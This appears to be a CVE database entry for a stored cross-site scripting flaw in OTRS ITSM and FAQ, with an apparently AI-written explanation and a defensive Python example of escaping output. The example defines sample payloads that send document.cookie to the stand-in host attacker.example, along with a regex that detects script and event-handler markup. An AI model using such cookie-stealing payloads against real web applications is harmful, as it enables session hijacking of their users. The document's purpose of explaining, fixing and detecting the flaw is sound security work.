CVE-2013-2637
Description
A Cross-Site Scripting (XSS) vulnerability exists in OTRS ITSM prior to 3.2.4, 3.1.8, and 3.0.7 and in FAQ prior to 2.1.4 and 2.0.8 via changes, workorder items, and FAQ articles, which could let a remote malicious user execute arbitrary script in the browser of any user who views the injected content.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Persistent XSS in OTRS ITSM and FAQ modules allows attackers with add permissions to inject arbitrary JavaScript via FAQ articles, changes, or workorder items.
Vulnerability
A persistent (stored) Cross-Site Scripting (XSS) vulnerability exists in the OTRS ITSM and FAQ modules. The flaw resides in the handling of user-supplied content in FAQ articles, changes, and workorder items: text submitted into these objects is stored and later rendered to other users without adequate output encoding. An attacker with permission to create or edit these items can therefore inject arbitrary HTML and JavaScript into fields such as the "Symptom" field of a FAQ article. Affected versions include OTRS ITSM prior to 3.2.4, 3.1.8, and 3.0.7, and FAQ prior to 2.1.4 and 2.0.8 [1].
Exploitation
An attacker must have the ability to add or modify FAQ articles, changes, or workorder items within the OTRS system. No special network position is required beyond normal authenticated access with those permissions. The attacker inserts malicious JavaScript into a text field (e.g., the Symptom field of a FAQ) and saves the item. The payload is then delivered by the application itself: whenever any user, including an administrator, opens the affected item, the script executes in that user's browser in the context of their OTRS session [1].
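The write-then-render pattern described above, as an added illustration that is not OTRS code and does not reproduce the project's templates: a stored "Symptom" value interpolated into HTML verbatim, the same template behind a naive script-tag blocklist (which still lets an event-handler payload through), and the hardened form that HTML-escapes every stored value at output time. The field name, the sample payloads, and all function names are constructed for this example; `find_poisoned_records` is the kind of sweep an incident responder would run over existing records after patching, since a rendering fix does not remove content that was already injected.

```python
import html
import re

# Constructed sample values standing in for a FAQ article's "Symptom" field.
# These, and every function name below, are illustrative; none of this is OTRS code.
BENIGN = "Printer reports error 0x13 & will not print"
PAYLOAD_SCRIPT = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
PAYLOAD_EVENT = "<img src=x onerror=\"fetch('http://attacker.example/?c='+document.cookie)\">"

# Markup a browser would execute on parse: a <script> tag, or an on* event
# handler attribute on any element.
ACTIVE_MARKUP = re.compile(r"<\s*script\b|<[^>]+\son\w+\s*=", re.IGNORECASE)


def has_active_markup(fragment):
    """True if the HTML fragment still contains executable markup."""
    return bool(ACTIVE_MARKUP.search(fragment))


def render_vulnerable(symptom):
    """Stored-XSS pattern: the saved field is interpolated into HTML verbatim."""
    return f'<div class="symptom">{symptom}</div>'


def strip_script_tags(text):
    """Blocklist-style input filter that only removes <script> tags."""
    return re.sub(r"<\s*/?\s*script[^>]*>", "", text, flags=re.IGNORECASE)


def render_filtered(symptom):
    """Same template behind the naive input filter; event handlers survive."""
    return f'<div class="symptom">{strip_script_tags(symptom)}</div>'


def render_hardened(symptom):
    """Output encoding for an HTML text context, applied at render time
    regardless of what was accepted on input."""
    return f'<div class="symptom">{html.escape(symptom, quote=True)}</div>'


def find_poisoned_records(store):
    """Post-patch sweep over stored records: which ones already carry a payload?
    Returns the sorted record ids whose raw stored text contains active markup."""
    return sorted(rid for rid, text in store.items() if has_active_markup(text))


if __name__ == "__main__":
    # Constructed in-memory stand-in for the records table.
    store = {"faq-1": BENIGN, "faq-2": PAYLOAD_SCRIPT, "faq-3": PAYLOAD_EVENT}
    for rid, text in store.items():
        print(rid,
              "vulnerable:", has_active_markup(render_vulnerable(text)),
              "filtered:", has_active_markup(render_filtered(text)),
              "hardened:", has_active_markup(render_hardened(text)))
    print("poisoned records:", find_poisoned_records(store))
```

The filtered variant is included to show why a tag blocklist is not a fix: `PAYLOAD_EVENT` contains no `<script>` at all and renders as live markup, whereas escaping at output turns both payloads into inert text.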
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the browser of any user viewing the compromised content. This can lead to session cookie theft (where the session cookie is not marked HttpOnly), impersonation through requests issued from the victim's authenticated session, defacement, or other client-side attacks. The attacker does not gain direct server-side access, but can act with the victim's privileges within the OTRS application, which matters most when the victim is an administrator [1].
Mitigation
The vulnerability is fixed in OTRS ITSM 3.2.4, 3.1.8, and 3.0.7, and in FAQ 2.1.4 and 2.0.8. Users should upgrade to these or later versions. The vendor's security advisory provides further details [1]. No workaround is documented in the available references. Because the injected content is stored, FAQ articles, changes, and workorder items created before the upgrade should also be reviewed for injected markup, since upgrading fixes how the content is rendered but does not remove what was already saved.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- OTRS/ITSM
Patches
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
- lists.opensuse.org/opensuse-updates/2013-08/msg00027.html
- www.exploit-db.com/exploits/24922
- www.securityfocus.com/bid/58930
- exchange.xforce.ibmcloud.com/vulnerabilities/83288
News mentions
No linked articles in our index yet.